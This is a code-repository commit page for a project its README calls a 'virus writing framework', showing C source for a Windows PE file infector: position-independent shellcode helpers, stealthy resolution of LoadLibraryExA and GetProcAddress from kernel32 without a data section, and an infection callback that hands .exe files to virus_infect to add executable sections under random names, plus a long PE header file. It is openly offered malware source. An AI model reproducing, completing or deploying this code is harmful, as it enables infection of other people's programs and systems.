eisbaer
/
PEter-virus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

initial commit. I dind't work on this project for a while now but as far as I remember everything works pretty good ;)

This commit is contained in:
F 2022-04-27 13:26:38 +02:00
commit fb5f2465a1
38 changed files with 5135 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md Normal file
View File

@ -0,0 +1,8 @@
This is my virus writing framework. Everythin is position independent (that's why strings are so stangely formated ;) ) you can load it everywhere
in memory and still call stdlib or winapi functions. You can also find funcitons for adding PE sections and so on...
To compile it use the following order of source files:
gcc aaa.c main.c rest zzz.c
Happy VXing

16
aaa.c Normal file
View File

@ -0,0 +1,16 @@
#include "aaa.h"
void *start() {
void *start;
__asm__("call nextIns;\r\n"
"nextIns:\r\n"
"pop %0\r\n"
: "=r" (start)
:
:);
start = start - 0x0b;
return start;
}

1
aaa.h Normal file
View File

@ -0,0 +1 @@
void *start();

120
export.c Normal file
View File

@ -0,0 +1,120 @@
#include "export.h"
IMAGE_EXPORT_DIRECTORY *get_loaded_export_hdr(void *image)
{
IMAGE_DOS_HEADER *dos;
IMAGE_NT_HEADERS32 *nt32;
IMAGE_NT_HEADERS64 *nt64;
IMAGE_FILE_HEADER *file;
IMAGE_OPTIONAL_HEADER32 *opt32;
IMAGE_OPTIONAL_HEADER64 *opt64;
dos = (IMAGE_DOS_HEADER *)image;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
nt32 = (IMAGE_NT_HEADERS32*)&((char*)image)[dos->e_lfanew];
if (nt32->Signature != IMAGE_NT_SIGNATURE) return NULL;
file = &nt32->FileHeader;
if (IMAGE_FILE_MACHINE_I386 == file->Machine)
{
opt32 = &nt32->OptionalHeader;
return (IMAGE_EXPORT_DIRECTORY *)&((char *)image)
[opt32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
.VirtualAddress];
}
else if (IMAGE_FILE_MACHINE_AMD64 == file->Machine)
{
nt64 = (IMAGE_NT_HEADERS64*)nt32;
opt64 = &nt64->OptionalHeader;
return (IMAGE_EXPORT_DIRECTORY *)&((char *)image)
[opt64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
.VirtualAddress];
}
else return NULL;
}
/////////////////////////////////////////////////
void *get_loaded_export_function_by_name(void *image, char *name)
{
IMAGE_EXPORT_DIRECTORY *export;
uint32_t *eft, *ent; //functions, names
uint16_t *eot; //offsets
export = get_loaded_export_hdr(image);
if (NULL == export) return NULL;
eft = (uint32_t *)&((char *)image)[export->AddressOfFunctions];
ent = (uint32_t *)&((char *)image)[export->AddressOfNames];
eot = (uint16_t *)&((char *)image)[export->AddressOfNameOrdinals];
for (int i = 0; i < export->NumberOfNames; i++)
{
if (0 == pic_strncmp((char *)&((char *)image)[ent[i]],
name, pic_strlen(name)))
return (char *)&((char*)image)[eft[eot[i]]];
}
return NULL;
}
/////////////////////////////////////////////////
/*kernelMZ is a pointer on the mz signature of the kernel32.dll
*which is loaded somewhere in the calling processes address space */
__attribute__((sysv_abi) )void *get_function_from_lib_by_kernelMZ(void *kernelMZ, char *libName,
char *funcName)
{
char loadLibraryName[15];
char getProcAddrName[15];
void *dll;
llib loadLibrary;
gpa getProcAddr;
//i know it looks ugly but we have to endure it
//sine we mustn't have the string in a seperate .data section
loadLibraryName[0] = 'L';
loadLibraryName[1] = 'o';
loadLibraryName[2] = 'a';
loadLibraryName[3] = 'd';
loadLibraryName[4] = 'L';
loadLibraryName[5] = 'i';
loadLibraryName[6] = 'b';
loadLibraryName[7] = 'r';
loadLibraryName[8] = 'a';
loadLibraryName[9] = 'r';
loadLibraryName[10] = 'y';
loadLibraryName[11] = 'E';
loadLibraryName[12] = 'x';
loadLibraryName[13] = 'A';
loadLibraryName[14] = '\x00';
getProcAddrName[0] = 'G';
getProcAddrName[1] = 'e';
getProcAddrName[2] = 't';
getProcAddrName[3] = 'P';
getProcAddrName[4] = 'r';
getProcAddrName[5] = 'o';
getProcAddrName[6] = 'c';
getProcAddrName[7] = 'A';
getProcAddrName[8] = 'd';
getProcAddrName[9] = 'd';
getProcAddrName[10] = 'r';
getProcAddrName[11] = 'e';
getProcAddrName[12] = 's';
getProcAddrName[13] = 's';
getProcAddrName[14] = '\x00';
loadLibrary = get_loaded_export_function_by_name(kernelMZ,
loadLibraryName);
getProcAddr = get_loaded_export_function_by_name(kernelMZ,
getProcAddrName);
if (NULL == loadLibrary) return NULL;
if (NULL == libName) {
dll = kernelMZ;
}
else {
dll = loadLibrary(libName, 0, 0);
}
if (NULL == dll) return NULL;
if (NULL == getProcAddr) return NULL;
return getProcAddr(dll, funcName);
}

21
export.h Normal file
View File

@ -0,0 +1,21 @@
#ifndef EXPORT
#define EXPORT
#include <stdint.h>
#include <stdio.h>
#include "stdfuncs.h"
#include "pe.h"
//#include <winsock.h>
#if defined(__amd64__)
typedef void *(*llib)(char *asciiName, uint64_t x, uint64_t y)__attribute__((ms_abi));
typedef void *(*gpa)(void *dll, char *procName)__attribute__((ms_abi));
#else
typedef void *(*llib)(char *asciiName, uint64_t x, uint64_t y)__attribute__((stdcall));
typedef void *(*gpa)(void *dll, char *procName)__attribute__((stdcall));
#endif
IMAGE_EXPORT_DIRECTORY *get_loaded_export_hdr(void *image);
void *get_loaded_export_function_by_name(void *image, char *name);
void *get_function_from_lib_by_kernelMZ(void *kernelMZ, char *libName,
char *funcName)__attribute__((sysv_abi));
#endif

101
infect.c Normal file
View File

@ -0,0 +1,101 @@
#include "infect.h"
//#include <stdio.h>
void *check_if_section_in_file(sec_info *file, sec_info *section);
void *check_if_file_in_file_list(sec_info *fileList, sec_info *file);
static void add_to_ret_list(sec_info *retBase, sec_info *newFbase);
static void merge_sec_lists(sec_info *retFbase, sec_info *addFbase);
sec_info *infect_build_sec_name_struct(pids *pids);
//void print_list(sec_info *list);
sec_info *si = NULL;
char *infect_gen_sec_name() {
char *charBytes, *oldSName;
int rand;
__asm__("call post;\r\n"
".string \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.1234567890\";\r\n"
".string \"CCCCCCCC\";\r\n"
"post:\r\n"
"pop %0;\r\n"
:"=r"(charBytes)
:
:);
// oldSName = charBytes + 63;
oldSName = pic_malloc(8);
rand = pic_gen_random(10);
if (rand < 5) return oldSName;
for (int i = 0; i < 8; i++) {
if (0 != i
&& oldSName[i-1] == 0) {
oldSName[i] = '\x00';
}
rand = pic_gen_random(64);
oldSName[i] = charBytes[rand];
}
return oldSName;
}
void *infect_callback_ptr() {
void *idp;
__asm__("call nIns;\r\n"
"nIns:\r\n"
"pop %0;\r\n"
:"=r" (idp)
:
:);
#define ID_OFFSET 12
return (idp+ID_OFFSET);
}
//returns number of infected files
int infect_callback(char *path, int pathLen, dir_list *fileAttr) {
char *exeString;
void *testFd;
char *secName;
__asm__("call afterString;\r\n"
".string \".exe\";\r\n"
".string \".new00\";\r\n"
"afterString:\r\n"
"pop %0;\r\n"
:"=r"(exeString)
:
:);
secName = infect_gen_sec_name();
if (!pic_strcmp(&path[pathLen-4], exeString)) return 0;
if (-1 == virus_infect(path, secName, (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))) return 0;
return 1;
}
void *infect_devices_ptr() {
void *idp;
__asm__("call nIns2;\r\n"
"nIns2:\r\n"
"pop %0\r\n"
:"=r" (idp)
:
:);
#define ID_OFFSET 12
return (idp+ID_OFFSET);
}
int infect_devices() {
dir_list *dev, *devCur;
void *icb;
icb = infect_callback_ptr();
dev = pic_get_devices();
devCur = dev;
while (devCur->next) {
// pic_get_paths_callback(devCur->fName, icb);
message_box( devCur->fName);
devCur = devCur->next;
}
return 0;
}

20
infect.h Normal file
View File

@ -0,0 +1,20 @@
#include "virus.h"
#include "stdfuncs.h"
#include "pic-peter/sections.h"
#include "pe.h"
typedef struct __SEC_INFO {
char name[8];
uint32_t flags;
void *next;
} sec_info;
int infect_running_procs();
int infect_devices();
void *infect_running_procs_ptr();
void *infect_devices_ptr();
int infect_callback(char *path, int pathLen, dir_list *fileAttr);
char *infect_gen_sec_name();

11
main.c Normal file
View File

@ -0,0 +1,11 @@
#include "infect.h"
#include "stdfuncs.h"
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
infect_devices();
return 0;
}

26
make_write.c Normal file
View File

@ -0,0 +1,26 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
FILE *fd;
char *buf, *secName;
int bufSz;
fd = fopen("a.exe", "rb");
fseek(fd, 0, SEEK_END);
bufSz = ftell(fd);
fseek(fd, 0, SEEK_SET);
buf = malloc(bufSz);
fread(buf, 1, bufSz, fd);
fclose(fd);
int i = 0;
while (secName = sections_by_index_get_name(buf, i)) {
sections_by_name_set_writable(buf, secName);
}
fd = fopen("a.exe", "w+b");
fwrite(buf, 1, bufSz, fd);
return 0;
}

562
pe.h Normal file
View File

@ -0,0 +1,562 @@
#ifndef PE_H
#define PE_H
#include <stdint.h>
#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
#define IMAGE_SIZEOF_FILE_HEADER 20
#define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
#define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
#define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
#define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
#define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
#define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
#define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
#define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
#define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
#define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
#define IMAGE_FILE_SYSTEM 0x1000 // System File.
#define IMAGE_FILE_DLL 0x2000 // File is a DLL.
#define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
#define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
#define IMAGE_FILE_MACHINE_UNKNOWN 0
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
#define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
#define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
#define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
#define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
#define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
#define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
#define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
#define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
#define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
#define IMAGE_FILE_MACHINE_THUMB 0x01c2
#define IMAGE_FILE_MACHINE_AM33 0x01d3
#define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
#define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
#define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
#define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
#define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
#define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
#define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
#define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
#define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
#define IMAGE_FILE_MACHINE_CEF 0x0CEF
#define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
#define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
#define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
#define IMAGE_FILE_MACHINE_CEE 0xC0EE
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
#define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
#define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
#define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
#define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
#define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
#define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
#define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
#define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
#define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
#define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
#define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
#define IMAGE_SUBSYSTEM_EFI_ROM 13
#define IMAGE_SUBSYSTEM_XBOX 14
#define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
#define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
#define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
#define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
#define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
#define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
#define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
#define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
#define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
#define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
#define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
#define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
#define IMAGE_SIZEOF_SHORT_NAME 8
#define IMAGE_SIZEOF_SECTION_HEADER 40
#define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
#define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
#define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
#define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
#define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
#define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
#define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
#define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
#define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
#define IMAGE_SCN_MEM_FARDATA 0x00008000
#define IMAGE_SCN_MEM_PURGEABLE 0x00020000
#define IMAGE_SCN_MEM_16BIT 0x00020000
#define IMAGE_SCN_MEM_LOCKED 0x00040000
#define IMAGE_SCN_MEM_PRELOAD 0x00080000
#define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
#define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
#define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
#define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
#define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
#define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
#define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
#define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
#define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
#define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
#define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
#define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
#define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
#define IMAGE_SCN_ALIGN_MASK 0x00F00000
#define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
#define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
#define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
#define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
#define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
#define IMAGE_SCN_SCALE_INDEX 0x00000001 // Tls index is scaled
#define IMAGE_SIZEOF_SYMBOL 18
#define IMAGE_SYM_TYPE_NULL 0x0000 // no type.
#define IMAGE_SYM_TYPE_VOID 0x0001 //
#define IMAGE_SYM_TYPE_CHAR 0x0002 // type character.
#define IMAGE_SYM_TYPE_SHORT 0x0003 // type short integer.
#define IMAGE_SYM_TYPE_INT 0x0004 //
#define IMAGE_SYM_TYPE_LONG 0x0005 //
#define IMAGE_SYM_TYPE_FLOAT 0x0006 //
#define IMAGE_SYM_TYPE_DOUBLE 0x0007 //
#define IMAGE_SYM_TYPE_STRUCT 0x0008 //
#define IMAGE_SYM_TYPE_UNION 0x0009 //
#define IMAGE_SYM_TYPE_ENUM 0x000A // enumeration.
#define IMAGE_SYM_TYPE_MOE 0x000B // member of enumeration.
#define IMAGE_SYM_TYPE_BYTE 0x000C //
#define IMAGE_SYM_TYPE_WORD 0x000D //
#define IMAGE_SYM_TYPE_UINT 0x000E //
#define IMAGE_SYM_TYPE_DWORD 0x000F //
#define IMAGE_SYM_TYPE_PCODE 0x8000 //
#define IMAGE_SYM_DTYPE_NULL 0 // no derived type.
#define IMAGE_SYM_DTYPE_POINTER 1 // pointer.
#define IMAGE_SYM_DTYPE_FUNCTION 2 // function.
#define IMAGE_SYM_DTYPE_ARRAY 3 // array.
#define IMAGE_SYM_CLASS_NULL 0x0000
#define IMAGE_SYM_CLASS_AUTOMATIC 0x0001
#define IMAGE_SYM_CLASS_EXTERNAL 0x0002
#define IMAGE_SYM_CLASS_STATIC 0x0003
#define IMAGE_SYM_CLASS_REGISTER 0x0004
#define IMAGE_SYM_CLASS_EXTERNAL_DEF 0x0005
#define IMAGE_SYM_CLASS_LABEL 0x0006
#define IMAGE_SYM_CLASS_UNDEFINED_LABEL 0x0007
#define IMAGE_SYM_CLASS_MEMBER_OF_STRUCT 0x0008
#define IMAGE_SYM_CLASS_ARGUMENT 0x0009
#define IMAGE_SYM_CLASS_STRUCT_TAG 0x000A
#define IMAGE_SYM_CLASS_MEMBER_OF_UNION 0x000B
#define IMAGE_SYM_CLASS_UNION_TAG 0x000C
#define IMAGE_SYM_CLASS_TYPE_DEFINITION 0x000D
#define IMAGE_SYM_CLASS_UNDEFINED_STATIC 0x000E
#define IMAGE_SYM_CLASS_ENUM_TAG 0x000F
#define IMAGE_SYM_CLASS_MEMBER_OF_ENUM 0x0010
#define IMAGE_SYM_CLASS_REGISTER_PARAM 0x0011
#define IMAGE_SYM_CLASS_BIT_FIELD 0x0012
#define IMAGE_SYM_CLASS_FAR_EXTERNAL 0x0044 //
#define IMAGE_SYM_CLASS_BLOCK 0x0064
#define IMAGE_SYM_CLASS_FUNCTION 0x0065
#define IMAGE_SYM_CLASS_END_OF_STRUCT 0x0066
#define IMAGE_SYM_CLASS_FILE 0x0067
#define IMAGE_SYM_CLASS_SECTION 0x0068
#define IMAGE_SYM_CLASS_WEAK_EXTERNAL 0x0069
#define IMAGE_SYM_CLASS_CLR_TOKEN 0x006B
#define IMAGE_REL_I386_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_I386_DIR16 0x0001 // Direct 16-bit reference to the symbols virtual address
#define IMAGE_REL_I386_REL16 0x0002 // PC-relative 16-bit reference to the symbols virtual address
#define IMAGE_REL_I386_DIR32 0x0006 // Direct 32-bit reference to the symbols virtual address
#define IMAGE_REL_I386_DIR32NB 0x0007 // Direct 32-bit reference to the symbols virtual address, base not included
#define IMAGE_REL_I386_SEG12 0x0009 // Direct 16-bit reference to the segment-selector bits of a 32-bit virtual address
#define IMAGE_REL_I386_SECTION 0x000A
#define IMAGE_REL_I386_SECREL 0x000B
#define IMAGE_REL_I386_TOKEN 0x000C // clr token
#define IMAGE_REL_I386_SECREL7 0x000D // 7 bit offset from base of section containing target
#define IMAGE_REL_I386_REL32 0x0014 // PC-relative 32-bit reference to the symbols virtual address
#define IMAGE_REL_MIPS_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_MIPS_REFHALF 0x0001
#define IMAGE_REL_MIPS_REFWORD 0x0002
#define IMAGE_REL_MIPS_JMPADDR 0x0003
#define IMAGE_REL_MIPS_REFHI 0x0004
#define IMAGE_REL_MIPS_REFLO 0x0005
#define IMAGE_REL_MIPS_GPREL 0x0006
#define IMAGE_REL_MIPS_LITERAL 0x0007
#define IMAGE_REL_MIPS_SECTION 0x000A
#define IMAGE_REL_MIPS_SECREL 0x000B
#define IMAGE_REL_MIPS_SECRELLO 0x000C // Low 16-bit section relative referemce (used for >32k TLS)
#define IMAGE_REL_MIPS_SECRELHI 0x000D // High 16-bit section relative reference (used for >32k TLS)
#define IMAGE_REL_MIPS_TOKEN 0x000E // clr token
#define IMAGE_REL_MIPS_JMPADDR16 0x0010
#define IMAGE_REL_MIPS_REFWORDNB 0x0022
#define IMAGE_REL_MIPS_PAIR 0x0025
#define IMAGE_REL_ALPHA_ABSOLUTE 0x0000
#define IMAGE_REL_ALPHA_REFLONG 0x0001
#define IMAGE_REL_ALPHA_REFQUAD 0x0002
#define IMAGE_REL_ALPHA_GPREL32 0x0003
#define IMAGE_REL_ALPHA_LITUSE 0x0005
#define IMAGE_REL_ALPHA_GPDISP 0x0006
#define IMAGE_REL_ALPHA_BRADDR 0x0007
#define IMAGE_REL_ALPHA_HINT 0x0008
#define IMAGE_REL_ALPHA_INLINE_REFLONG 0x0009
#define IMAGE_REL_ALPHA_REFHI 0x000A
#define IMAGE_REL_ALPHA_REFLO 0x000B
#define IMAGE_REL_ALPHA_PAIR 0x000C
#define IMAGE_REL_ALPHA_MATCH 0x000D
#define IMAGE_REL_ALPHA_SECTION 0x000E
#define IMAGE_REL_ALPHA_SECREL 0x000F
#define IMAGE_REL_ALPHA_REFLONGNB 0x0010
#define IMAGE_REL_ALPHA_SECRELLO 0x0011 // Low 16-bit section relative reference
#define IMAGE_REL_ALPHA_SECRELHI 0x0012 // High 16-bit section relative reference
#define IMAGE_REL_ALPHA_REFQ3 0x0013 // High 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_REFQ2 0x0014 // Middle 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_REFQ1 0x0015 // Low 16 bits of 48 bit reference
#define IMAGE_REL_ALPHA_GPRELLO 0x0016 // Low 16-bit GP relative reference
#define IMAGE_REL_ALPHA_GPRELHI 0x0017 // High 16-bit GP relative reference
#define IMAGE_REL_PPC_ABSOLUTE 0x0000 // NOP
#define IMAGE_REL_PPC_ADDR64 0x0001 // 64-bit address
#define IMAGE_REL_PPC_ADDR32 0x0002 // 32-bit address
#define IMAGE_REL_PPC_ADDR24 0x0003 // 26-bit address, shifted left 2 (branch absolute)
#define IMAGE_REL_PPC_ADDR16 0x0004 // 16-bit address
#define IMAGE_REL_PPC_REL24 0x0006 // 26-bit PC-relative offset, shifted left 2 (branch relative)
#define IMAGE_REL_PPC_REL14 0x0007 // 16-bit PC-relative offset, shifted left 2 (br cond relative)
#define IMAGE_REL_PPC_TOCREL16 0x0008 // 16-bit offset from TOC base
#define IMAGE_REL_PPC_ADDR32NB 0x000A // 32-bit addr w/o image base
#define IMAGE_REL_PPC_SECREL 0x000B // va of containing section (as in an image sectionhdr)
#define IMAGE_REL_PPC_SECTION 0x000C // sectionheader number
#define IMAGE_REL_PPC_IFGLUE 0x000D // substitute TOC restore instruction iff symbol is glue code
#define IMAGE_REL_PPC_SECREL16 0x000F // va of containing section (limited to 16 bits)
#define IMAGE_REL_PPC_REFLO 0x0011
#define IMAGE_REL_PPC_PAIR 0x0012
#define IMAGE_REL_PPC_SECRELHI 0x0014 // High 16-bit section relative reference (used for >32k TLS)
#define IMAGE_REL_PPC_GPREL 0x0015
#define IMAGE_REL_PPC_TOKEN 0x0016 // clr token
#define IMAGE_REL_PPC_NEG 0x0100 // subtract reloc value rather than adding it
#define IMAGE_REL_PPC_BRTAKEN 0x0200 // fix branch prediction bit to predict branch taken
#define IMAGE_REL_PPC_BRNTAKEN 0x0400 // fix branch prediction bit to predict branch not taken
#define IMAGE_REL_PPC_TOCDEFN 0x0800 // toc slot defined in file (or, data in toc)
#define IMAGE_REL_SH3_DIRECT16 0x0001 // 16 bit direct
#define IMAGE_REL_SH3_DIRECT32 0x0002 // 32 bit direct
#define IMAGE_REL_SH3_DIRECT8_WORD 0x0004 // 8 bit direct .W (0 ext.)
#define IMAGE_REL_SH3_DIRECT8_LONG 0x0005 // 8 bit direct .L (0 ext.)
#define IMAGE_REL_SH3_DIRECT4 0x0006 // 4 bit direct (0 ext.)
#define IMAGE_REL_SH3_DIRECT4_WORD 0x0007 // 4 bit direct .W (0 ext.)
#define IMAGE_REL_SH3_PCREL8_WORD 0x0009 // 8 bit PC relative .W
#define IMAGE_REL_SH3_PCREL8_LONG 0x000A // 8 bit PC relative .L
#define IMAGE_REL_SH3_PCREL12_WORD 0x000B // 12 LSB PC relative .W
#define IMAGE_REL_SH3_SIZEOF_SECTION 0x000D // Size of EXE section
#define IMAGE_REL_SH3_SECTION 0x000E // Section table index
#define IMAGE_REL_SH3_SECREL 0x000F // Offset within section
#define IMAGE_REL_SH3_DIRECT32_NB 0x0010 // 32 bit direct not based
#define IMAGE_REL_SH3_GPREL4_LONG 0x0011 // GP-relative addressing
#define IMAGE_REL_SH3_TOKEN 0x0012 // clr token
#define IMAGE_REL_SHM_PCRELPT 0x0013 // Offset from current
#define IMAGE_REL_SHM_REFLO 0x0014 // Low bits of 32-bit address
#define IMAGE_REL_SHM_REFHALF 0x0015 // High bits of 32-bit address
#define IMAGE_REL_SHM_RELLO 0x0016 // Low bits of relative reference
#define IMAGE_REL_SHM_RELHALF 0x0017 // High bits of relative reference
#define IMAGE_REL_SHM_PAIR 0x0018 // offset operand for relocation
#define IMAGE_REL_SH_NOMODE 0x8000 // relocation ignores section mode
#define IMAGE_REL_ARM_ABSOLUTE 0x0000 // No relocation required
#define IMAGE_REL_ARM_ADDR32 0x0001 // 32 bit address
#define IMAGE_REL_ARM_ADDR32NB 0x0002 // 32 bit address w/o image base
#define IMAGE_REL_ARM_BRANCH24 0x0003 // 24 bit offset << 2 & sign ext.
#define IMAGE_REL_ARM_BRANCH11 0x0004 // Thumb: 2 11 bit offsets
#define IMAGE_REL_ARM_TOKEN 0x0005 // clr token
#define IMAGE_REL_ARM_GPREL7 0x0007 // GP-relative addressing (Thumb)
#define IMAGE_REL_ARM_BLX24 0x0008
#define IMAGE_REL_ARM_BLX11 0x0009
#define IMAGE_REL_ARM_SECREL 0x000F // Offset within section
#define IMAGE_REL_AM_ABSOLUTE 0x0000
#define IMAGE_REL_AM_ADDR32NB 0x0002
#define IMAGE_REL_AM_FUNCINFO 0x0004
#define IMAGE_REL_AM_REL32_1 0x0005
#define IMAGE_REL_AM_REL32_2 0x0006
#define IMAGE_REL_AM_SECTION 0x0008
#define IMAGE_REL_AM_TOKEN 0x0009
#define IMAGE_REL_AMD64_ADDR64 0x0001 // 64-bit address (VA).
#define IMAGE_REL_AMD64_ADDR32 0x0002 // 32-bit address (VA).
